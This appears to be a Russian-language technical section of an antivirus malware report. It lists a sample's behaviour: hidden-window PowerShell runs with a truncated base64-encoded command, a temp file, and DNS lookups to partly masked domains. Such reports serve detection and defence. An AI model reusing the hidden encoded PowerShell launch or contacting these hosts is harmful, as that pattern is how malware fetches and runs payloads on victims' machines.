Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABTAHMAZgB6AGUAeABzAGsAdAB0AHMAZgBpAD0AJwBLAGIAegBsAGYAZgB2AGYAJwA7ACQAVQBuAGoAdgB0AGMAbABiAGYAaQBwACAAPQAgACcAMgAyADIAJwA7ACQATABtAHMAZABwAHcAcgBxAHQAdQA9ACcAWABwAHUAZQBiAHQAcQB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1560
- %TEMP%\1165748.cvr
- DNS ASK ua#.###yquakewith.us
- DNS ASK pa#####bat.lipi.go.id
- DNS ASK pb#.##sisdev.info
- DNS ASK pn######.dev.webdoodle.com.au
- DNS ASK in#####ion4crisis.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABTAHMAZgB6AGUAeABzAGsAdAB0AHMAZgBpAD0AJwBLAGIAegBsAGYAZgB2AGYAJwA7ACQAVQBuAGoAdgB0AGMAbABiAGYAaQBwACAAPQAgACcAMgAyADIAJwA7ACQATABtAHMAZABwAHcAcgBxAHQAdQA9ACcAWABwAHUAZQBiAHQAcQB...' (со скрытым окном)